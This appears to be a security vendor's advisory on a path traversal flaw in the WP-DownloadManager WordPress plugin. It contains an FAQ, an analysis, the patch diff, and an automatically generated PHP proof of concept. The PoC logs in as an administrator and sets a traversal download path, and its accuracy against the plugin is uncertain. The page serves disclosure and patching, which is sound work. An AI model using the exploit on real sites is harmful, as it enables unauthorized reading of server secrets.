What is CVE-2026-2419?

CVE-2026-2419 is a low-severity path traversal vulnerability in the WP-DownloadManager plugin for WordPress, affecting versions up to and including 1.69. It allows authenticated users with administrator privileges to read arbitrary files on the server by exploiting the ‘download_path’ parameter.

How does the vulnerability work?

The vulnerability arises from insufficient validation of the ‘download_path’ parameter, allowing attackers to use directory traversal sequences to bypass security checks. By manipulating the path, an attacker can access files outside the intended directory, potentially exposing sensitive information.

Who is affected by this vulnerability?

Any WordPress site using the WP-DownloadManager plugin version 1.69 or earlier is at risk. Specifically, only users with administrator-level access can exploit this vulnerability, making it critical for site administrators to check their user roles and plugin versions.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the WP-DownloadManager plugin in your WordPress admin panel. If it is version 1.69 or earlier, your site is at risk of this vulnerability.

How can I fix this vulnerability?

To mitigate this vulnerability, update the WP-DownloadManager plugin to version 1.69.1 or later, where the issue has been patched. Regularly check for updates to ensure your plugins are secure.

What does the CVSS score of 2.7 mean?

A CVSS score of 2.7 indicates a low severity level for this vulnerability. This means while it poses a risk, the likelihood of exploitation is limited to users with administrator access, and the potential impact is primarily file disclosure rather than system compromise.

What is path traversal?

Path traversal is a type of security vulnerability that allows an attacker to access files and directories stored outside the intended directory. By manipulating file paths, attackers can read sensitive files on the server, leading to information disclosure.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an authenticated attacker can exploit the vulnerability by sending a crafted request to the server. It demonstrates the steps to authenticate, manipulate the ‘download_path’, and access files outside the intended directory.

What files could be exposed through this vulnerability?

Exploiting this vulnerability could allow an attacker to read sensitive files such as configuration files (e.g., wp-config.php), environment files, or any other files that contain sensitive data, such as passwords and API keys.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the WP-DownloadManager plugin to prevent exploitation. Additionally, review user permissions and limit access to administrator accounts until the plugin can be updated.

Are there any other security measures I should take?

In addition to updating plugins, regularly audit user roles, implement strong passwords, and utilize security plugins to monitor for suspicious activity. Regular backups and security scans can also help mitigate risks.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-2419: WP-DownloadManager <= 1.69 – Authenticated (Administrator+) Path Traversal to Arbitrary File Read via 'download_path' Parameter (wp-downloadmanager)

CVE ID CVE-2026-2419

Plugin wp-downloadmanager

Severity Low (CVSS 2.7)

CWE 22

Vulnerable Version 1.69

Patched Version 1.69.1

Disclosed February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2419:
This vulnerability is an authenticated path traversal in the WP-DownloadManager WordPress plugin, affecting all versions up to and including 1.69. The flaw resides in the plugin’s configuration validation, allowing an administrator-level attacker to read arbitrary files on the server by manipulating the download path setting.

The root cause is insufficient path validation in the `download-options.php` file. Before the patch, the validation logic at line 42 only checked if the submitted `$download_path` string started with the `WP_CONTENT_DIR` string. This check could be bypassed using directory traversal sequences (e.g., `../../../`) because the validation did not resolve the path to its canonical, absolute form. An attacker could submit a path like `/var/www/html/wp-content/uploads/../../../etc/`, which starts with the required prefix but ultimately points outside the intended directory.

Exploitation requires an attacker with administrator privileges to access the plugin’s settings page. The attacker would POST a malicious `download_path` parameter to the options update handler. By setting this parameter to a value like `WP_CONTENT_DIR/uploads/../../../`, the attacker reconfigures the plugin’s base directory. Subsequent use of the plugin’s file browser functionality, which lists files relative to this configured path, would then expose files outside the `WP_CONTENT_DIR` boundary, enabling arbitrary file read.

The patch, applied in `download-options.php`, replaces the simple string prefix check with a robust validation routine. It uses `realpath()` to resolve both the submitted `$download_path` and the `WP_CONTENT_DIR` to their canonical, absolute forms. The new condition at line 42 requires the resolved download path to be a valid, existing directory (`false === $real_download_path`), requires the WP_CONTENT_DIR to resolve, and checks that the canonical download path starts with the canonical WP_CONTENT_DIR path. It also explicitly blocks paths containing `../` sequences. This ensures the configured path cannot escape the intended directory tree.

Successful exploitation leads to arbitrary file read. An attacker with administrator access can exfiltrate sensitive server files, including configuration files (e.g., `wp-config.php`), environment files, or system files containing passwords and keys. This significantly expands the attack surface from a simple file download manager to a server information disclosure tool.

Differential between vulnerable and patched code

Code Diff

--- a/wp-downloadmanager/download-manager.php
+++ b/wp-downloadmanager/download-manager.php
@@ -139,16 +139,21 @@
 							if( $file_upload_to !== '/' ) {
 								$file_upload_to = $file_upload_to . '/';
 							}
-							if(move_uploaded_file($_FILES['file_upload']['tmp_name'], $file_path.$file_upload_to.basename($_FILES['file_upload']['name']))) {
-								$file = $file_upload_to.basename($_FILES['file_upload']['name']);
-								$file = download_rename_file($file_path, $file);
-								$file_size = filesize($file_path.$file);
+							$validate = wp_check_filetype_and_ext( $_FILES['file_upload']['tmp_name'], basename( $_FILES['file_upload']['name'] ) );
+							if ( $validate['type'] === false ) {
+									$text = '<p style="color: red;">' . __('File type is invalid', 'wp-downloadmanager') . '</p>';
+									break;
+							}
+							if( move_uploaded_file( $_FILES['file_upload']['tmp_name'], $file_path.$file_upload_to . basename( $_FILES['file_upload']['name'] ) ) ) {
+								$file = $file_upload_to . basename( $_FILES['file_upload']['name'] );
+								$file = download_rename_file( $file_path, $file );
+								$file_size = filesize( $file_path . $file );
 							} else {
-								$text = '<p style="color: red;">'.__('Error In Uploading File', 'wp-downloadmanager').'</p>';
+								$text = '<p style="color: red;">' . __('Error In Uploading File', 'wp-downloadmanager') . '</p>';
 								break;
 							}
 						} else {
-							$text = '<p style="color: red;">'.__('Error In Uploading File', 'wp-downloadmanager').'</p>';
+							$text = '<p style="color: red;">' . __('Error In Uploading File', 'wp-downloadmanager') . '</p>';
 							break;
 						}
 					}
@@ -208,21 +213,20 @@
 		case __('Delete File', 'wp-downloadmanager');
 			check_admin_referer('wp-downloadmanager_delete-file');
 			$file_id  = ! empty( $_POST['file_id'] ) ? intval( $_POST['file_id'] ) : 0;
-			$file = ! empty( $_POST['file'] ) ? sanitize_text_field( $_POST['file'] ) : '';
-			$file_name = ! empty( $_POST['file_name'] ) ? sanitize_text_field( $_POST['file_name'] ) : '';
+			$file = $wpdb->get_row( $wpdb->prepare( "SELECT * FROM $wpdb->downloads WHERE file_id = %d", $file_id ) );
 			$unlinkfile = ! empty( $_POST['unlinkfile'] ) ? intval( $_POST['unlinkfile'] ) : 0;
-			if($unlinkfile == 1) {
-				if(!unlink($file_path.$file)) {
-					$text = '<p style="color: red;">'.sprintf(__('Error In Deleting File '%s (%s)' From Server', 'wp-downloadmanager'), $file_name, $file).'</p>';
+			if ( $unlinkfile === 1 ) {
+				if ( ! unlink( $file_path . $file->file ) ) {
+					$text = '<p style="color: red;">' . sprintf( __( 'Error In Deleting File '%s (%s)' From Server', 'wp-downloadmanager' ), $file->file_name, $file->file ) . '</p>';
 				} else {
-					$text = '<p style="color: green;">'.sprintf(__('File '%s (%s)' Deleted From Server Successfully', 'wp-downloadmanager'), $file_name, $file).'</p>';
+					$text = '<p style="color: green;">' . sprintf( __( 'File '%s (%s)' Deleted From Server Successfully', 'wp-downloadmanager' ), $file->file_name, $file->file ) . '</p>';
 				}
 			}
-			$deletefile = $wpdb->query("DELETE FROM $wpdb->downloads WHERE file_id = $file_id");
-			if(!$deletefile) {
-				$text .= '<p style="color: red;">'.sprintf(__('Error In Deleting File '%s (%s)'', 'wp-downloadmanager'), $file_name, $file).'</p>';
+			$deletefile = $wpdb->query( $wpdb->prepare( "DELETE FROM $wpdb->downloads WHERE file_id = %d", $file->file_id ) );
+			if ( ! $deletefile ) {
+				$text .= '<p style="color: red;">' . sprintf( __('Error In Deleting File '%s (%s)'', 'wp-downloadmanager'), $file->file_name, $file->file) . '</p>';
 			} else {
-				$text .= '<p style="color: green;">'.sprintf(__('File '%s (%s)' Deleted Successfully', 'wp-downloadmanager'), $file_name, $file).'</p>';
+				$text .= '<p style="color: green;">' . sprintf( __('File '%s (%s)' Deleted Successfully', 'wp-downloadmanager'), $file->file_name, $file->file) . '</p>';
 			}
 			break;
 	}
@@ -376,9 +380,7 @@
 		<?php if(!empty($text)) { echo '<!-- Last Action --><div id="message" class="updated fade"><p>'.stripslashes($text).'</p></div>'; } ?>
 		<!-- Delete A File -->
 		<form method="post" action="<?php echo admin_url('admin.php?page='.plugin_basename(__FILE__)); ?>">
-			<input type="hidden" name="file_id" value="<?php echo intval($file->file_id); ?>" />
-			<input type="hidden" name="file" value="<?php echo esc_attr( removeslashes( $file->file ) ); ?>" />
-			<input type="hidden" name="file_name" value="<?php echo esc_attr( removeslashes( $file->file_name ) ); ?>" />
+			<input type="hidden" name="file_id" value="<?php echo esc_attr( intval( $file->file_id ) ); ?>" />
 			<?php wp_nonce_field('wp-downloadmanager_delete-file'); ?>
 			<div class="wrap">
 				<h2><?php _e('Delete A File', 'wp-downloadmanager'); ?></h2>
--- a/wp-downloadmanager/download-options.php
+++ b/wp-downloadmanager/download-options.php
@@ -39,7 +39,10 @@
     $download_options = array('use_filename' => $download_options_use_filename, 'rss_sortby' => $download_options_rss_sortby, 'rss_limit' => $download_options_rss_limit);

     // Validate
-    if ( substr( $download_path, 0, strlen( WP_CONTENT_DIR ) ) !== WP_CONTENT_DIR ) {
+    $real_download_path = realpath( $download_path );
+    $real_wp_content_dir = realpath( WP_CONTENT_DIR );
+
+    if ( false === $real_download_path || false === $real_wp_content_dir || strpos( $real_download_path . DIRECTORY_SEPARATOR, $real_wp_content_dir ) !== 0 || strpos( $download_path, '../' ) !== false ) {
         $download_path = WP_CONTENT_DIR;
     }

--- a/wp-downloadmanager/wp-downloadmanager.php
+++ b/wp-downloadmanager/wp-downloadmanager.php
@@ -3,7 +3,7 @@
 Plugin Name: WP-DownloadManager
 Plugin URI: https://lesterchan.net/portfolio/programming/php/
 Description: Adds a simple download manager to your WordPress blog.
-Version: 1.69
+Version: 1.69.1
 Author: Lester 'GaMerZ' Chan
 Author URI: https://lesterchan.net
 Text Domain: wp-downloadmanager
@@ -30,7 +30,7 @@


 ### Version
-define( 'WP_DOWNLOADMANAGER_VERSION', '1.69' );
+define( 'WP_DOWNLOADMANAGER_VERSION', '1.69.1' );

 ### Create text domain for translations
 add_action( 'plugins_loaded', 'downloadmanager_textdomain' );
@@ -1074,10 +1074,10 @@
 			$template_download_embedded = str_replace("%FILE_SIZE_DEC%",  format_filesize_dec($file->file_size), $template_download_embedded);
 			$template_download_embedded = str_replace("%FILE_CATEGORY_ID%", (int) $file->file_category, $template_download_embedded);
 			$template_download_embedded = str_replace("%FILE_CATEGORY_NAME%", stripslashes($download_categories[(int) $file->file_category]), $template_download_embedded);
-			$template_download_embedded = str_replace("%FILE_DATE%",  mysql2date(get_option('date_format'), gmdate('Y-m-d H:i:s', $file->file_date)), $template_download_embedded);
-			$template_download_embedded = str_replace("%FILE_TIME%",  mysql2date(get_option('time_format'), gmdate('Y-m-d H:i:s', $file->file_date)), $template_download_embedded);
-			$template_download_embedded = str_replace("%FILE_UPDATED_DATE%",  mysql2date(get_option('date_format'), gmdate('Y-m-d H:i:s', $file->file_updated_date)), $template_download_embedded);
-			$template_download_embedded = str_replace("%FILE_UPDATED_TIME%",  mysql2date(get_option('time_format'), gmdate('Y-m-d H:i:s', $file->file_updated_date)), $template_download_embedded);
+			$template_download_embedded = str_replace("%FILE_DATE%",  mysql2date(get_option('date_format'), gmdate('Y-m-d H:i:s', (int) $file->file_date)), $template_download_embedded);
+			$template_download_embedded = str_replace("%FILE_TIME%",  mysql2date(get_option('time_format'), gmdate('Y-m-d H:i:s', (int) $file->file_date)), $template_download_embedded);
+			$template_download_embedded = str_replace("%FILE_UPDATED_DATE%",  mysql2date(get_option('date_format'), gmdate('Y-m-d H:i:s', (int) $file->file_updated_date)), $template_download_embedded);
+			$template_download_embedded = str_replace("%FILE_UPDATED_TIME%",  mysql2date(get_option('time_format'), gmdate('Y-m-d H:i:s', (int) $file->file_updated_date)), $template_download_embedded);
 			$template_download_embedded = str_replace("%FILE_HITS%", number_format_i18n($file->file_hits), $template_download_embedded);
 			$template_download_embedded = str_replace("%FILE_DOWNLOAD_URL%", download_file_url($file->file_id, $file->file), $template_download_embedded);
 			$output .= $template_download_embedded;

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2419 - WP-DownloadManager <= 1.69 - Authenticated (Administrator+) Path Traversal to Arbitrary File Read via 'download_path' Parameter

<?php

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'admin';
$password = 'password';

// Initialize cURL session for cookie persistence
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$login_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
];

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_fields));
$response = curl_exec($ch);

// Verify login by checking for admin dashboard link in response
if (strpos($response, 'wp-admin') === false) {
    die('Authentication failed. Check credentials.');
}

// Step 2: Navigate to the plugin's options page to get the nonce
$options_page_url = $target_url . '/wp-admin/admin.php?page=download-manager/download-options.php';
curl_setopt($ch, CURLOPT_URL, $options_page_url);
curl_setopt($ch, CURLOPT_POST, false);
$options_page = curl_exec($ch);

// Extract the nonce from the update options form
preg_match('/name="_wpnonce" value="([^"]+)"/', $options_page, $nonce_matches);
if (empty($nonce_matches[1])) {
    die('Could not extract security nonce from options page.');
}
$nonce = $nonce_matches[1];

// Step 3: Craft malicious payload to set download_path outside WP_CONTENT_DIR
// This attempts to set the path to the server root for demonstration.
$malicious_path = '/var/www/html/wp-content/uploads/../../../';

$exploit_fields = [
    'download_path' => $malicious_path,
    'download_path_url' => '', // Optional field
    'download_method' => '1',
    'download_subfolder' => '0',
    'download_options_use_filename' => '0',
    'download_options_rss_sortby' => 'file_id',
    'download_options_rss_limit' => '10',
    'option_page' => 'downloadmanager_options',
    'action' => 'update',
    '_wpnonce' => $nonce,
    '_wp_http_referer' => '/wp-admin/admin.php?page=download-manager/download-options.php',
    'Submit' => 'Save Changes'
];

// Submit the malicious configuration
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/options.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_fields));
$exploit_response = curl_exec($ch);

if (strpos($exploit_response, 'Settings saved.') !== false) {
    echo "[+] Successfully updated download_path to: $malicious_pathn";
    echo "[+] The plugin's file browser at /wp-admin/admin.php?page=download-manager/download-manager.php can now list files from the new path.n";
    echo "[+] To read a specific file, an attacker could manipulate the file listing functionality.n";
} else {
    echo "[-] Exploit may have failed. The site might be patched or the path was rejected.n";
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-2419?
Overview of the vulnerability
CVE-2026-2419 is a low-severity path traversal vulnerability in the WP-DownloadManager plugin for WordPress, affecting versions up to and including 1.69. It allows authenticated users with administrator privileges to read arbitrary files on the server by exploiting the ‘download_path’ parameter.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient validation of the ‘download_path’ parameter, allowing attackers to use directory traversal sequences to bypass security checks. By manipulating the path, an attacker can access files outside the intended directory, potentially exposing sensitive information.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the WP-DownloadManager plugin version 1.69 or earlier is at risk. Specifically, only users with administrator-level access can exploit this vulnerability, making it critical for site administrators to check their user roles and plugin versions.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the WP-DownloadManager plugin in your WordPress admin panel. If it is version 1.69 or earlier, your site is at risk of this vulnerability.
How can I fix this vulnerability?
Recommended actions
To mitigate this vulnerability, update the WP-DownloadManager plugin to version 1.69.1 or later, where the issue has been patched. Regularly check for updates to ensure your plugins are secure.
What does the CVSS score of 2.7 mean?
Understanding severity ratings
A CVSS score of 2.7 indicates a low severity level for this vulnerability. This means while it poses a risk, the likelihood of exploitation is limited to users with administrator access, and the potential impact is primarily file disclosure rather than system compromise.
What is path traversal?
Definition and implications
Path traversal is a type of security vulnerability that allows an attacker to access files and directories stored outside the intended directory. By manipulating file paths, attackers can read sensitive files on the server, leading to information disclosure.
How does the proof of concept demonstrate the issue?
Exploit illustration
The proof of concept provided shows how an authenticated attacker can exploit the vulnerability by sending a crafted request to the server. It demonstrates the steps to authenticate, manipulate the ‘download_path’, and access files outside the intended directory.
What files could be exposed through this vulnerability?
Potential sensitive information
Exploiting this vulnerability could allow an attacker to read sensitive files such as configuration files (e.g., wp-config.php), environment files, or any other files that contain sensitive data, such as passwords and API keys.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updating is not possible, consider disabling the WP-DownloadManager plugin to prevent exploitation. Additionally, review user permissions and limit access to administrator accounts until the plugin can be updated.
Are there any other security measures I should take?
Best practices for WordPress security
In addition to updating plugins, regularly audit user roles, implement strong passwords, and utilize security plugins to monitor for suspicious activity. Regular backups and security scans can also help mitigate risks.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations